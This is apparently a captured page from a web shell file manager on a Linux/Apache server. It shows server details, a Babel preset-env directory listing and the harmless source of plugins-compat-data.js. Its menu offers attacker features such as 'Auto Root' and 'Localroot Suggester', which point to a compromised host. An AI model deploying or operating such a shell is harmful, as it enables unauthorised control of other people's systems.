Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
@babel /
preset-env /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
polyfills
[ DIR ]
drwxr-xr-x
2024-07-10 10:56
available-plugins.js
12.29
KB
-rw-r--r--
2024-02-26 08:46
debug.js
1.13
KB
-rw-r--r--
2024-02-26 08:46
filter-items.js
1.03
KB
-rw-r--r--
2024-02-26 08:46
get-option-specific-excludes.js
319
B
-rw-r--r--
2024-02-26 08:46
index.js
11.19
KB
-rw-r--r--
2024-02-26 08:46
module-transformations.js
428
B
-rw-r--r--
2024-02-26 08:46
normalize-options.js
7.51
KB
-rw-r--r--
2024-02-26 08:46
options.js
1010
B
-rw-r--r--
2024-02-26 08:46
package.json
20
B
-rw-r--r--
2024-02-26 08:46
plugins-compat-data.js
1007
B
-rw-r--r--
2024-02-26 08:46
shipped-proposals.js
1.39
KB
-rw-r--r--
2024-02-26 08:46
targets-parser.js
506
B
-rw-r--r--
2024-02-26 08:46
Save
Rename
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.pluginsBugfixes = exports.plugins = exports.overlappingPlugins = void 0; var _plugins = require("@babel/compat-data/plugins"); var _pluginBugfixes = require("@babel/compat-data/plugin-bugfixes"); var _overlappingPlugins = require("@babel/compat-data/overlapping-plugins"); var _availablePlugins = require("./available-plugins"); const keys = Object.keys; const plugins = filterAvailable(_plugins); exports.plugins = plugins; const pluginsBugfixes = filterAvailable(_pluginBugfixes); exports.pluginsBugfixes = pluginsBugfixes; const overlappingPlugins = filterAvailable(_overlappingPlugins); exports.overlappingPlugins = overlappingPlugins; function filterAvailable(data) { const result = {}; for (const plugin of keys(data)) { if (Object.hasOwnProperty.call(_availablePlugins.default, plugin)) { result[plugin] = data[plugin]; } } return result; } //# sourceMappingURL=plugins-compat-data.js.map